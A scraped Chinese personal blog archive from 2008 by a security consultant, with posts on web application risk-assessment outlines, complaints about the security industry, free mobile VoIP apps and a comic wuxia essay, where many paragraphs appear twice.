or rsync [OPTION]... [USER@]HOST:SRC [DEST]
or rsync [OPTION]... [USER@]HOST::SRC [DEST]
or rsync [OPTION]... rsync://[USER@]HOST[:PORT]/SRC [DEST]
rsync -vzrtopg --progress --delete //192.168.1.9/g$ /cygdrive/j/tmp/extmail
rsync [选项]....[源]....[目地]
2008年7月19日星期六
90%以上的IE都可能受到影响
测试方法:
<h1>ncph of something<i>before</i></h1>
<br> the <b>JavaScript</b>... ncphncph
<script type="text/jscript">
function init() {
document.write("The time is now: " + Date() );
}
window.onload = init;
</script>
And <u>ncph of something</u> after the <b>JavaScript</b>
<h1>ncph of something<i>before</i></h1>
<br> the <b>JavaScript</b>... ncphncph
<script type="text/jscript">
function init() {
document.write("The time is now: " + Date() );
}
window.onload = init;
</script>
And <u>ncph of something</u> after the <b>JavaScript</b>
2008年7月18日星期五
只要基于intel cpu的操作系统,都可以远程入侵?
只要基于intel cpu的操作系统,都可以远程入侵?只看到这么个消息,感觉这下问题大了,前一阵儿那么多的windows漏洞、DNS漏洞都已经让人崩溃了,这下子来了个更狠的。
为什么可以在短时间内控制一个国家数量的计算机?攻击和渗透的精髓,就在于把攻击行为隐藏于正常的操作行为之中,然后再这个那个,这就是攻击的最高境界,哈
为什么可以在短时间内控制一个国家数量的计算机?攻击和渗透的精髓,就在于把攻击行为隐藏于正常的操作行为之中,然后再这个那个,这就是攻击的最高境界,哈
如何对web应用进行安全风险评估,保护web网站?
如何对web应用进行安全风险评估,保护web网站?
看到某公司出了一种产品,安星,是远程网站安全检查服务,这个服务挺好,确实能解决一部分问题,但并不象他们吹嘘的那么好,实际上还有许多安全风险,是通过远程评估无法找到的。比如文件系统权限、进程分配、后台数据加密、访问控制策略、备份及应急、系统强度、风险量化指标等等,有大量的东西,是无法通过远程扫一下就能找出来的。现在因为浮燥的氛围,许多人理解安全评估,好像就是用扫描工具扫一下就完事了,实际扫描工具能起到多大作用呢?连10%的作用都不到,有许多东西是用扫描工具无法检测出来的,另外扫描工具也有许多差异,并不是每一种都非常好用。扫描仅是风险评估的一个辅助工具,还有入侵渗透测试,都是大量工作中的一个点,仅仅是一个点的工作量而已。
以web应用的风险评估过程来说,比较完整的风险评估包括哪些工作呢?下面首先列举一下风险评估前准备的资源。需要特别说明的是,这只是应用评估中比较简单的个例,仅是风险评估工作中的一小部分。
本文只想发表在我的blog上面,请勿转载或引用。
对web应用进行风险评估,首先需要准备如下资源:
安全评估标准
漏洞扫描器
Web应用缺陷分析系统
数据库缺陷分析系统
安全开发规范知识性理解
资产统计表格,网络拓朴
威胁计算
相关系统日志
代码审计资源
完整安全策略
透彻清晰的安全需求
大体步骤和测试方法如下:
确定需要保护的信息资产有哪些?网站正常功能、显示页面及图片、后台数据、机密信息.......
分析现有资产,进行结构性描述与分析过程,包括子系统、边界、功能模式、网络数据流向、策略等。
分解应用系统,划分成为多个子集进行深入挖掘。周边网络、主机操作系统、WEB平台、后台功能代码、数据库等.
网络被动式信息收集、边界与关键节点通路评估。网关设备、过滤与控制设备、IDS、网闸。
主机安全性评估。
Port,服务、文件系统、网络连接、补丁、防病毒、安全功能组件、进程权限、访问策略、自动化报警、审计相关、备份、防ddos、防arp、系统强度分析.
Web平台安全评估:旗标、进程权限、配置管理、安全管理、内容管理、会话变量管理、防篡改。
后台应用安全性评估,包括注入、跨站、挂马、弱口令、绕过认证、输入验证、XML、web应用管理。
数据库安全评估,主要侧重于web相关.
找出威胁,记录、评估与计算、报告撰写.
上面只是列出纲要,大家看到了,每一项的后面,实际有非常大的工作量,里面有大家比较熟悉的注入测试、跨站测试、挂马测试,看一看,安星一类的产品做完了哪些东西呢?实际上大家都生活的非常浮燥,在国内,只要有关系和有资源,就可以掌握许多东西,现在我几乎免费地为人解决问题,解决信息网络中存在的问题,但还是没有足够的机会,现实中的系统,问题太多了,可以肯定地说,以现在的情况,只要有人组织一次有效的网络攻击,可以在很短的时间内,控制某一个国家大部分计算机系统,包括用了大量防火墙、入侵检测、配备了大量安全应急响应人员,比如某活动保障组的兄弟,为什么会这么轻易?因为现在的安全系统,安全防护模式,都有许多缺陷,落后于攻击方法的演进,尤其针对大规模的、慢速的、(p2p)分布式的、worm式的、自动智能防杀免杀的。。。。这些特征能不能集成到一个东西里面,实际的网络中存不存在?现在发现了没有?你认为呢?前些天有哥们说,现在有个科幻电影,就是针对一个国家的网络攻击,然后跟我说,他们如何通过网络几乎控制了核武器发动战争。我想告诉大家的是,科幻电影里描述的东西,在现实中已经存在了,许多攻击手段甚至是几年前已经使用了。现实是,只要找到三五个人,就可以发动针对一个国家的网络战争。尤其象我们国家这种安全现状,可能会受非常大的影响。奥运期间会不会出事?反正我不乐观,咱们知道的东西,破坏者可能知道的更多。
最近几天为某省做风险评估,看了一些国内知名公司做的东西,只有一个印象,大家都忙着赚钱呢。没办法,谁让咱没有关系没有资源呢?这个机会,还是哥们儿的公司没做过类似项目,让我在后台操作的,还得以他公司的名义干活,没白天没黑夜的,努力保证评估效果。这也是曲线救国,希望通过做项目的机会,认识一些人,把现在的风险说出来,让大家认识到,还有这么多问题没有解决,还有大量的工作需要落实。
早上起来,一口气写了许多,算是发泄一下郁闷吧。
------------------------------------------------------------------
本文只想发表在我的blog上面,请勿转载或引用。
-------------------------------------------------------------------
最近的挂马攻击、下载型病毒、BOT、网络安全现状预示,可能将会发生大范围事件,请记下我的联系方式 ,,如有紧急情况请尽快与我联系
mail: dyxian@139.com
skype:xianyua
gtalk:
irc:
aim:
发邮件即可,我的邮箱有PUSH功能,可以随时收到,即时联系。
看到某公司出了一种产品,安星,是远程网站安全检查服务,这个服务挺好,确实能解决一部分问题,但并不象他们吹嘘的那么好,实际上还有许多安全风险,是通过远程评估无法找到的。比如文件系统权限、进程分配、后台数据加密、访问控制策略、备份及应急、系统强度、风险量化指标等等,有大量的东西,是无法通过远程扫一下就能找出来的。现在因为浮燥的氛围,许多人理解安全评估,好像就是用扫描工具扫一下就完事了,实际扫描工具能起到多大作用呢?连10%的作用都不到,有许多东西是用扫描工具无法检测出来的,另外扫描工具也有许多差异,并不是每一种都非常好用。扫描仅是风险评估的一个辅助工具,还有入侵渗透测试,都是大量工作中的一个点,仅仅是一个点的工作量而已。
以web应用的风险评估过程来说,比较完整的风险评估包括哪些工作呢?下面首先列举一下风险评估前准备的资源。需要特别说明的是,这只是应用评估中比较简单的个例,仅是风险评估工作中的一小部分。
本文只想发表在我的blog上面,请勿转载或引用。
对web应用进行风险评估,首先需要准备如下资源:
安全评估标准
漏洞扫描器
Web应用缺陷分析系统
数据库缺陷分析系统
安全开发规范知识性理解
资产统计表格,网络拓朴
威胁计算
相关系统日志
代码审计资源
完整安全策略
透彻清晰的安全需求
大体步骤和测试方法如下:
确定需要保护的信息资产有哪些?网站正常功能、显示页面及图片、后台数据、机密信息.......
分析现有资产,进行结构性描述与分析过程,包括子系统、边界、功能模式、网络数据流向、策略等。
分解应用系统,划分成为多个子集进行深入挖掘。周边网络、主机操作系统、WEB平台、后台功能代码、数据库等.
网络被动式信息收集、边界与关键节点通路评估。网关设备、过滤与控制设备、IDS、网闸。
主机安全性评估。
Port,服务、文件系统、网络连接、补丁、防病毒、安全功能组件、进程权限、访问策略、自动化报警、审计相关、备份、防ddos、防arp、系统强度分析.
Web平台安全评估:旗标、进程权限、配置管理、安全管理、内容管理、会话变量管理、防篡改。
后台应用安全性评估,包括注入、跨站、挂马、弱口令、绕过认证、输入验证、XML、web应用管理。
数据库安全评估,主要侧重于web相关.
找出威胁,记录、评估与计算、报告撰写.
上面只是列出纲要,大家看到了,每一项的后面,实际有非常大的工作量,里面有大家比较熟悉的注入测试、跨站测试、挂马测试,看一看,安星一类的产品做完了哪些东西呢?实际上大家都生活的非常浮燥,在国内,只要有关系和有资源,就可以掌握许多东西,现在我几乎免费地为人解决问题,解决信息网络中存在的问题,但还是没有足够的机会,现实中的系统,问题太多了,可以肯定地说,以现在的情况,只要有人组织一次有效的网络攻击,可以在很短的时间内,控制某一个国家大部分计算机系统,包括用了大量防火墙、入侵检测、配备了大量安全应急响应人员,比如某活动保障组的兄弟,为什么会这么轻易?因为现在的安全系统,安全防护模式,都有许多缺陷,落后于攻击方法的演进,尤其针对大规模的、慢速的、(p2p)分布式的、worm式的、自动智能防杀免杀的。。。。这些特征能不能集成到一个东西里面,实际的网络中存不存在?现在发现了没有?你认为呢?前些天有哥们说,现在有个科幻电影,就是针对一个国家的网络攻击,然后跟我说,他们如何通过网络几乎控制了核武器发动战争。我想告诉大家的是,科幻电影里描述的东西,在现实中已经存在了,许多攻击手段甚至是几年前已经使用了。现实是,只要找到三五个人,就可以发动针对一个国家的网络战争。尤其象我们国家这种安全现状,可能会受非常大的影响。奥运期间会不会出事?反正我不乐观,咱们知道的东西,破坏者可能知道的更多。
最近几天为某省做风险评估,看了一些国内知名公司做的东西,只有一个印象,大家都忙着赚钱呢。没办法,谁让咱没有关系没有资源呢?这个机会,还是哥们儿的公司没做过类似项目,让我在后台操作的,还得以他公司的名义干活,没白天没黑夜的,努力保证评估效果。这也是曲线救国,希望通过做项目的机会,认识一些人,把现在的风险说出来,让大家认识到,还有这么多问题没有解决,还有大量的工作需要落实。
早上起来,一口气写了许多,算是发泄一下郁闷吧。
------------------------------------------------------------------
本文只想发表在我的blog上面,请勿转载或引用。
-------------------------------------------------------------------
最近的挂马攻击、下载型病毒、BOT、网络安全现状预示,可能将会发生大范围事件,请记下我的联系方式 ,,如有紧急情况请尽快与我联系
mail: dyxian@139.com
skype:xianyua
gtalk:
irc:
aim:
发邮件即可,我的邮箱有PUSH功能,可以随时收到,即时联系。
2008年7月14日星期一
是做祥林嫂,还是做思考者??
翻了一下最近一二个月的日记,发现自己不停地在说,现在的安全风险有多严重,安全现状到了什么严重的程度,我们应该朝哪个方向努力,应该做些什么。很多人会非常感兴趣,都要我去演示一下最新的东西,包括已经存在安全模式,已经做过的评估,如何起不到应有的作用,如何挖掘出潜在的风险。。。。
忽然,我觉的陷入了一个怪套,快成死循环了,即使我在某个方面具有优势,我能不能再加强呢?撇下这些人,再前进一步,再看看现在的视角是不是狭窄?是不是猥琐?是不是傲慢?是不是没有生命力了?
不必着急发展的事情,先把眼前自己最擅长的事情搞好,总有机会的,哪怕在这儿等着,守株待兔,也要保持自己的优势。
忽然,我觉的陷入了一个怪套,快成死循环了,即使我在某个方面具有优势,我能不能再加强呢?撇下这些人,再前进一步,再看看现在的视角是不是狭窄?是不是猥琐?是不是傲慢?是不是没有生命力了?
不必着急发展的事情,先把眼前自己最擅长的事情搞好,总有机会的,哪怕在这儿等着,守株待兔,也要保持自己的优势。
紧急通知
最近的挂马攻击、下载型病毒、BOT,网络安全现状,可能会有将会发生大范围事件,请记下我的联系方式 ,如有紧
急情况及时联系
需要注意的是,国内做网络安全的同行,有些过于乐观了,或者是固步自封,有些很严重的威胁并没有意识到,会到多深的程度,奥运会保障组的兄弟,每个人都有自己的视野所限,不要过于自信了。每次跟某帮人交流,他们都说,你把自己掌握的拿过来交流一下吧,我想说,凭啥呀?我已经给了这么多建议,做了这么多工作,已经把很多东西说的很透彻了,还要怎么样啊?还要我自个儿掏路费,跑到一个过门都要搜身的地方,给你讲讲最新的安全防护思路?你们拿了这么多钱,干点儿人事行不行?最起码,真诚一些,谦虚一些,把自己应该干好的事情,努力做到最好的程度。
太气人了。也许大环境就是这样,很多人都在忽悠,谁也不相信谁了,只有CPU能忠实执行每条指令,从键盘到代码,是自己最真诚的伙伴,其他的,哪还有半点儿乐趣?
急情况及时联系
需要注意的是,国内做网络安全的同行,有些过于乐观了,或者是固步自封,有些很严重的威胁并没有意识到,会到多深的程度,奥运会保障组的兄弟,每个人都有自己的视野所限,不要过于自信了。每次跟某帮人交流,他们都说,你把自己掌握的拿过来交流一下吧,我想说,凭啥呀?我已经给了这么多建议,做了这么多工作,已经把很多东西说的很透彻了,还要怎么样啊?还要我自个儿掏路费,跑到一个过门都要搜身的地方,给你讲讲最新的安全防护思路?你们拿了这么多钱,干点儿人事行不行?最起码,真诚一些,谦虚一些,把自己应该干好的事情,努力做到最好的程度。
太气人了。也许大环境就是这样,很多人都在忽悠,谁也不相信谁了,只有CPU能忠实执行每条指令,从键盘到代码,是自己最真诚的伙伴,其他的,哪还有半点儿乐趣?
2008年7月8日星期二
如何实现免费的通讯,免费的电话
一下子变的繁忙起来.左手是文字版本的最强大,右手是语音版本的最强大,语音文字我都已经实现了免费而强大的功能.具体说来,就是上网.短信.电话,我都 找到许多方法免费目的了.除了国内有名的随e聊,还有pica皮卡一类,还有更好的,和一般电话效果相较差不多的voip电话.每一个经过这几天我反复地 试验,效果都是超级一流棒.
先来说说我的左手机.左手机用的是treo 600,基于palm系统,带qwerty键盘,我最称赏它的速度,它的键盘,它的大量功能各异 的免费工具,呈称几万软件库,有大量你想像不到的东东,各种各样的功能.同样有这种魅力的手机是bb黑莓.有这种键盘的手机,安上五笔输入法,一分钟超过 一百字非常轻松,感觉和ibm tp600笔记本键盘,在手机上敲字变成了一种享受,盲打的五笔啊.其它也有大量的手机用了qwerty键盘,但就象小hei的键盘,已经成为绝响了,再 也没有达到treo手感的,所以,我的右手机,一块配置很高的ppc成了我的语音帮手,帮助我实现免费电话的功能.其实一些高配的nokia手机也能实现 免费电话功能,不过就象买游戏机,ppc手机可以实现硬件上的实惠,想想ps3,xbox360,多棒的价格啊,有了硬件,你可以选择不玩游戏,让这些硬 件发挥更大的功能,你可以做集群做服务器做计算做最棒的平台,哪一种选择都会让你的人生变的优美.
下面详细说说,在treo上面如何实现免费的通讯功能.
接着刚才的话题继续说,先说说如何在treo上面免费通讯,再说说用我的右手机实现勉强电话功能.
treo用了轻便短快的palm系统,让你可以在如此低的硬件平台下实现这么多的强大功能.
呀,不好,有事要处理,快点写下我的方案吧.
在treo下面,可以用随e聊绑定msn,写博客,雅虎通,qq等一些文字性的聊天功能,因为手机只支持到gprs,所以语音功能只能在数据线连接的情况 下才能使用.要是稍高些的硬件版本,能够支持edge,蓝牙,甚至wifi,那就没什么问题了.语音功能有几个工具,一个ar什么的效果不错,不过我很长 时间没去用了,因为连网速度太慢了.连个蓝牙都没有,比较让人郁闷了.
环境比较乱,文字性的免费聊天计有皮卡,随e聊,pushmail,还有什么来着?一会儿下线再翻看我的手机,都装了哪些通讯方面的东东,对了,还有个做做客可以免费发短信.先下线,一会儿回来
又翻看了一下手机,除了上面这些东东,还有UCWEB,ucmail,Xrose,最好的还有飞信,我有许多同事挂在这上面,互相发短信是免费的。刚才说的treo上用的语音工具,名字叫articulation,这个工具不大,效果却非常不错。恩,原来觉的有许多来着,怎么只找出这么几个呀。不过也不错了,msn/雅虎通/免费短信,已经帮助我们实现免费沟通了,这些都是基于gprs的,只会发生一点儿流量,配和gprs的流量管理工具Traffic Stat,只要不超过套餐费用就没事。
右手机的语音功能,主要是fring,eqo,随e聊,皮卡,Raketu-mobile,skype,voipcall,OctroTalk,飞信,还有什么呢?确实是好多呀,最好用的是前面三个,或者是四个,第三四个是国内,皮卡这几天老是注册不上,用着不爽。随E聊居然可以支持很多很多的手机,他们的开发团队真是太棒了,不断推出新功能,不断推出支持新手机的版本,非常有进取心。前二个,漂亮而实用,和国内的风格不一样,哈,支持的IM工具更多,效果更好,所以我主要用前二者,更重要的是,他们都可以实现非常棒的语音功能,可以方便地实现免费电话,哈,这样就再也不会受漫游之苦了,漫游加长途,一分钟一块多钱,谁也花不起这个钱啊。
除了手机的帮助,只要能找个上网的地方,在电脑上的选择就更多了,基本几十块儿,就可以不受限制地打电话了,这一方面与便携的手机通讯无关,网上已经大量地介绍了相关知识了,就不多说了,马上开饭了。byebye
先来说说我的左手机.左手机用的是treo 600,基于palm系统,带qwerty键盘,我最称赏它的速度,它的键盘,它的大量功能各异 的免费工具,呈称几万软件库,有大量你想像不到的东东,各种各样的功能.同样有这种魅力的手机是bb黑莓.有这种键盘的手机,安上五笔输入法,一分钟超过 一百字非常轻松,感觉和ibm tp600笔记本键盘,在手机上敲字变成了一种享受,盲打的五笔啊.其它也有大量的手机用了qwerty键盘,但就象小hei的键盘,已经成为绝响了,再 也没有达到treo手感的,所以,我的右手机,一块配置很高的ppc成了我的语音帮手,帮助我实现免费电话的功能.其实一些高配的nokia手机也能实现 免费电话功能,不过就象买游戏机,ppc手机可以实现硬件上的实惠,想想ps3,xbox360,多棒的价格啊,有了硬件,你可以选择不玩游戏,让这些硬 件发挥更大的功能,你可以做集群做服务器做计算做最棒的平台,哪一种选择都会让你的人生变的优美.
下面详细说说,在treo上面如何实现免费的通讯功能.
接着刚才的话题继续说,先说说如何在treo上面免费通讯,再说说用我的右手机实现勉强电话功能.
treo用了轻便短快的palm系统,让你可以在如此低的硬件平台下实现这么多的强大功能.
呀,不好,有事要处理,快点写下我的方案吧.
在treo下面,可以用随e聊绑定msn,写博客,雅虎通,qq等一些文字性的聊天功能,因为手机只支持到gprs,所以语音功能只能在数据线连接的情况 下才能使用.要是稍高些的硬件版本,能够支持edge,蓝牙,甚至wifi,那就没什么问题了.语音功能有几个工具,一个ar什么的效果不错,不过我很长 时间没去用了,因为连网速度太慢了.连个蓝牙都没有,比较让人郁闷了.
环境比较乱,文字性的免费聊天计有皮卡,随e聊,pushmail,还有什么来着?一会儿下线再翻看我的手机,都装了哪些通讯方面的东东,对了,还有个做做客可以免费发短信.先下线,一会儿回来
又翻看了一下手机,除了上面这些东东,还有UCWEB,ucmail,Xrose,最好的还有飞信,我有许多同事挂在这上面,互相发短信是免费的。刚才说的treo上用的语音工具,名字叫articulation,这个工具不大,效果却非常不错。恩,原来觉的有许多来着,怎么只找出这么几个呀。不过也不错了,msn/雅虎通/免费短信,已经帮助我们实现免费沟通了,这些都是基于gprs的,只会发生一点儿流量,配和gprs的流量管理工具Traffic Stat,只要不超过套餐费用就没事。
右手机的语音功能,主要是fring,eqo,随e聊,皮卡,Raketu-mobile,skype,voipcall,OctroTalk,飞信,还有什么呢?确实是好多呀,最好用的是前面三个,或者是四个,第三四个是国内,皮卡这几天老是注册不上,用着不爽。随E聊居然可以支持很多很多的手机,他们的开发团队真是太棒了,不断推出新功能,不断推出支持新手机的版本,非常有进取心。前二个,漂亮而实用,和国内的风格不一样,哈,支持的IM工具更多,效果更好,所以我主要用前二者,更重要的是,他们都可以实现非常棒的语音功能,可以方便地实现免费电话,哈,这样就再也不会受漫游之苦了,漫游加长途,一分钟一块多钱,谁也花不起这个钱啊。
除了手机的帮助,只要能找个上网的地方,在电脑上的选择就更多了,基本几十块儿,就可以不受限制地打电话了,这一方面与便携的手机通讯无关,网上已经大量地介绍了相关知识了,就不多说了,马上开饭了。byebye
2008年7月6日星期日
免费电话的几种方案
出差一趟,漫游费太多了,花了不少,于是研究一下如何免费语音通话。有几种方案:
1,国内的随e聊,这个功能挺多,效果不错,而且支持cmwap/cmnet,可以代理登录msn/qq/yahoo雅虎通,而且支持很多手机终端,感觉他们的开发团队非常有进步心,不断地推出新功能新版本,比飞信强多了。
2.皮卡pica,也非常好,比上面的稍微差一点儿,但体积比较小
3.fring,国外的一个东东,非常棒,可以支持你知道的大部分IMl软件,我主要用这个。
4.电话回拨,费用低一些,但无法解决漫游费问题。
5.网络电话,国内比较有名的uucall,效果不错,绿色版,不到1mb,资费也很便宜,遗憾没有手机版本,无法在ppc或symbian上面使用。
6.自建的sip服务器,通过im转到pstn线路上面,这个以前实验成功过,skype开放了许多api,一小段代码就可以实现了,运行后操作计算机上的modem就可以了,效果也非常好,应该接近CD的音质,哈哈。不方便的地方是我得整天开着机,又用不了几次。
7.在当地买个接听免费的卡,进行透传,显示原来的号码,网上有大量卖的。但要是呆的时间不长,不划算。
8.还有其它方式吗?暂时想到这些。
总之,voip是王道,当然,还可以通过蓝牙免费借当地人的电话用,不过这招有些损,咱干正经营生的就不要用了。
1,国内的随e聊,这个功能挺多,效果不错,而且支持cmwap/cmnet,可以代理登录msn/qq/yahoo雅虎通,而且支持很多手机终端,感觉他们的开发团队非常有进步心,不断地推出新功能新版本,比飞信强多了。
2.皮卡pica,也非常好,比上面的稍微差一点儿,但体积比较小
3.fring,国外的一个东东,非常棒,可以支持你知道的大部分IMl软件,我主要用这个。
4.电话回拨,费用低一些,但无法解决漫游费问题。
5.网络电话,国内比较有名的uucall,效果不错,绿色版,不到1mb,资费也很便宜,遗憾没有手机版本,无法在ppc或symbian上面使用。
6.自建的sip服务器,通过im转到pstn线路上面,这个以前实验成功过,skype开放了许多api,一小段代码就可以实现了,运行后操作计算机上的modem就可以了,效果也非常好,应该接近CD的音质,哈哈。不方便的地方是我得整天开着机,又用不了几次。
7.在当地买个接听免费的卡,进行透传,显示原来的号码,网上有大量卖的。但要是呆的时间不长,不划算。
8.还有其它方式吗?暂时想到这些。
总之,voip是王道,当然,还可以通过蓝牙免费借当地人的电话用,不过这招有些损,咱干正经营生的就不要用了。
2008年7月4日星期五
由现在的安全防护模式想到的
现在的安全设备和防护模式比较难以解决的问题,暂时想到的有如下几种:
针对网站的注入攻击、跨站、HTML恶意代码、DDOS攻击、慢速蠕虫、浏览器漏洞攻击、IM攻击、恶意短信、(邮件)、社交工程攻击,有些问题都是大量存在的,国内的sina/sohu/163/baidu,包括google都存在许多问题,只用简单的方法就可以利用,进而影响到大量的受众群。
最近评估类的业务真是多,从别人转包给我的业数量能看出来了,真是干不完。但现在的这些评估,真是怀疑效果怎么样。感觉上,就象前些年大量上安全设备,似乎可以解决问题了。但已经发生的许多入侵损害,真的通过这些简单的评估,就挖出来吗?比如针对一个国家的进行信息战争,提前准备的一些东西,通过评估能发现吗?已经中招的那些东西,就单个节点就要分析一段时间了,谁有那么多精力时间去做?启明星辰、绿盟也牛大发了,不知道原来的优势还能不能保持住,听哥们儿说,据说一百万以下的确单子不屑一顾了。钱这东西,真是让人堕落啊。要是再加上官僚感染,有许多伙计,估计只剩下自信和自负了。
哥们儿拉我到北京开公司,很是汗颜,虽然我做的那几十种安全设备可以解决一些问题,但都是基于开源改过来的,没有我做的核心东西,只是对客户存在相关安全需求时,免费提供给客户的解决方法,难道能拿来卖钱?但是但是,客户从国内一家知名安全厂家买的设备,有那么多问题,人家怎么可以拿来卖钱呢? 这个东西,真是要保持原则抵抗诱惑,和漂亮MM的主动搭讪让人心痒呢。
在外边,不知道睡眠质量好,还是有事睡不着,总睡几个小时,精神头还挺好。晚上12点多才睡,早上6点就醒了。到北京,看到原来的哥们儿发展的非常成功了,几个兄弟都住着大HOUSE,养几辆车,手下几十号人,认识某某大员某某领导某某专家,甚至做成朋友了。相比之下,我还骑着自行车,光杆司令,认识的都是做技术的兄弟,或者整天调皮捣蛋的小兄弟。原来还看不上他们用那么多精力做漂亮的文档,现在看看自己写的文档,真是丑陋无比,和人家的差距太大了。另外做事也不如人家用心,只是整天弄自己感兴趣让人兴奋的东西。不过,真是让人难以选择,他们把一些有趣的事情,变的如此让人痛苦,要是让我做那么漂亮的文档,真是一种折磨啊,啥时候才能做出来啊?
不过,文档真的非常非常重要,我哥们儿就靠这一手功夫,在竟标时打败了启明星辰,打败了绿盟,打败了联想,甚至打标的价格是联想的二倍,最后还中标了,而且中间也没搞吃喝送拿下的,真是让人惊叹不已。想到这一点,写文档辛苦些也是值得的。
针对网站的注入攻击、跨站、HTML恶意代码、DDOS攻击、慢速蠕虫、浏览器漏洞攻击、IM攻击、恶意短信、(邮件)、社交工程攻击,有些问题都是大量存在的,国内的sina/sohu/163/baidu,包括google都存在许多问题,只用简单的方法就可以利用,进而影响到大量的受众群。
最近评估类的业务真是多,从别人转包给我的业数量能看出来了,真是干不完。但现在的这些评估,真是怀疑效果怎么样。感觉上,就象前些年大量上安全设备,似乎可以解决问题了。但已经发生的许多入侵损害,真的通过这些简单的评估,就挖出来吗?比如针对一个国家的进行信息战争,提前准备的一些东西,通过评估能发现吗?已经中招的那些东西,就单个节点就要分析一段时间了,谁有那么多精力时间去做?启明星辰、绿盟也牛大发了,不知道原来的优势还能不能保持住,听哥们儿说,据说一百万以下的确单子不屑一顾了。钱这东西,真是让人堕落啊。要是再加上官僚感染,有许多伙计,估计只剩下自信和自负了。
哥们儿拉我到北京开公司,很是汗颜,虽然我做的那几十种安全设备可以解决一些问题,但都是基于开源改过来的,没有我做的核心东西,只是对客户存在相关安全需求时,免费提供给客户的解决方法,难道能拿来卖钱?但是但是,客户从国内一家知名安全厂家买的设备,有那么多问题,人家怎么可以拿来卖钱呢? 这个东西,真是要保持原则抵抗诱惑,和漂亮MM的主动搭讪让人心痒呢。
在外边,不知道睡眠质量好,还是有事睡不着,总睡几个小时,精神头还挺好。晚上12点多才睡,早上6点就醒了。到北京,看到原来的哥们儿发展的非常成功了,几个兄弟都住着大HOUSE,养几辆车,手下几十号人,认识某某大员某某领导某某专家,甚至做成朋友了。相比之下,我还骑着自行车,光杆司令,认识的都是做技术的兄弟,或者整天调皮捣蛋的小兄弟。原来还看不上他们用那么多精力做漂亮的文档,现在看看自己写的文档,真是丑陋无比,和人家的差距太大了。另外做事也不如人家用心,只是整天弄自己感兴趣让人兴奋的东西。不过,真是让人难以选择,他们把一些有趣的事情,变的如此让人痛苦,要是让我做那么漂亮的文档,真是一种折磨啊,啥时候才能做出来啊?
不过,文档真的非常非常重要,我哥们儿就靠这一手功夫,在竟标时打败了启明星辰,打败了绿盟,打败了联想,甚至打标的价格是联想的二倍,最后还中标了,而且中间也没搞吃喝送拿下的,真是让人惊叹不已。想到这一点,写文档辛苦些也是值得的。
2008年7月1日星期二
写的不错的高考0分作文
高考0分作文!太NB了!
题目:"细雨湿衣看不见,闲花落地听无声"是唐朝诗人刘长卿在《别严士元》中的诗句。曾经有人这样理解这句诗:1、这是歌颂春天的美好意境。2、闲花、细雨表达了不为人知的寂寞。3、看不见、听不见不等于无所作为,是一种恬淡的处世之道。4、这种意境已经不适合当今的世界……根据你的看法写一篇作文。题目自拟,体裁不限。字数800以上。
盛夏,夜,深夜。
景山山颠。
山上有人,两个人,一男一女。
这两人就是当今武林名声最响的两位杀手,男的名秋细雨,女的叫叶闲花,江湖人称"细雨闲花"。
诗人刘长卿曾用"细雨湿衣看不见,闲花落地听无声"来描述这两个可怕的杀手。细雨湿衣,湿衣的是鲜血;闲花落地,落地的是人头。这两人杀人来无影去无踪,如果他们想杀你,当你还没看到他们人影没听到他们声音的时候,你就已经死了。
秋细雨三天前接到一份帖子,指名要杀叶闲花。事成之后,不但有三百万两冥币,更可以让他在"红楼梦中人"选秀节目中担任曹雪芹的角色!
但是杀死叶闲花比杀死比尔还要难得多。
江湖中没有一个人清楚叶闲花的武功来历,性格脾气,但是每个人都知道叶闲花的故事。
叶闲花有一双迷人的大眼睛,据说她曾一动不动地瞪死过赵薇和高圆圆,而那一年她才十七岁。
叶闲花声音有如黄莺般幽婉醉人,传说听过她说话后林志玲身体酥麻了整整一年,你说要不要命?
叶闲花轻功独步武林,踏雪无痕,落地无声,号称超过当年青翼蝠王韦一笑。有人见她上星期在高速公路上偷了刘翔奥运会入场证,刘翔追出一万公里最后被活活累倒。
一般人听到叶闲花的故事早就吓得去买尿不湿了,但是秋细雨没有去买。
秋细雨不是一般人。
他知道,杀人不但要靠技术,还要拼人品!
秋细雨很镇定,他正用一把指甲刀修整着手指甲,他的手指修长有力。
他要等待,等待对方先沉不住气。高手相争,不允许一丝一毫的失误,先沉不住气的人就会露出破绽。
致命的破绽!
因此秋细雨一言不发,只是静静地玩弄着指甲刀。
没想到叶闲花更是好整以暇,自己悠然自得地涂口红,喷香水。
秋细雨只好先发制人,道:"你知道我找你出来是为什么。"
叶闲花温柔道:"在我们动手之前,不能先谈谈么?"
秋细雨道:"我是来杀人的,不是来聊天的。"
叶闲花道:"你有把握杀我?"
秋细雨道:"我从不做没有把握的事情。"
叶闲花道:"我要提醒你一件事。"
秋细雨道:"你说。"
叶闲花道:"百晓生作杀手谱,小女子是杀手榜排名第一,阁下区区第二,你真能杀得了我么?"
秋细雨道:"我也要提醒你一件事。"
叶闲花道:"你说。"
秋细雨道:"论杀手实力,我本在你之前,只是那次排名百晓生采用了短信投票系统,中国''人数过于庞大才让你得了第一。"
叶闲花的脸色一变,道:"我更要提醒你,我的粉丝团叫'花粉',不叫''!"
秋细雨道:"我最后要提醒你,你的那些'花粉'全都是。还有,我们已经跑题了。"
叶闲花道:"我们这样拼命厮杀,你难道不怕麻烦么?"
秋细雨道:"你以后再也不用怕麻烦了,天下只有一种人永远不怕麻烦,死人!"
叶闲花道:"这么说你非逼我出手不可?"
秋细雨没有回答,他已不用回答。
秋细雨道:"亮兵器!"
叶闲花道:"我用刀。"
秋细雨道:"你用刀?刀在何处?"
叶闲花道:"我就是刀!"
叶闲花露出甜甜的笑容,忽然间褪下了自己的衣服,全身上下只剩下蕾丝比基尼和黑色丝袜。
叶闲花的脸美得让人窒息,再配上这样的身材,这样的服饰,充满了一种原始的诱惑力。
她的眼睛会说话,她的媚笑会说话,她的手,她的胸膛,她的腿……她身上每分每寸都会说话。
她知道,只要是个不瞎的男人,现在肯定会被她迷得神魂颠倒。
秋细雨是个男人,而且是个不瞎的男人。
可他现在却偏偏好像瞎了一样,完全无动于衷。
他知道,美丽的女人是一把刀,当你沉醉的时候,刀就会切进你的胸口。
秋细雨沉吟道:"我只想问你一件事。"
叶闲花娇笑着:"请讲。"
秋细雨道:"大夏天的,穿这么少你丫不怕蚊子叮啊?"
叶闲花沉默了半晌,幽幽地道:"你一定以为刚才我在喷香水,是不是?我告诉你,我喷的是六神花露水!"
叶闲花又道:"不过这不是普通的六神,是我特别提炼的药水,无色无味无毒,不过却会慢慢扩散在空气中,闻到它的人会四肢麻痹不能动弹。"
秋细雨一惊,忽然觉得身体已经麻木不听使唤,不由得一身汗。
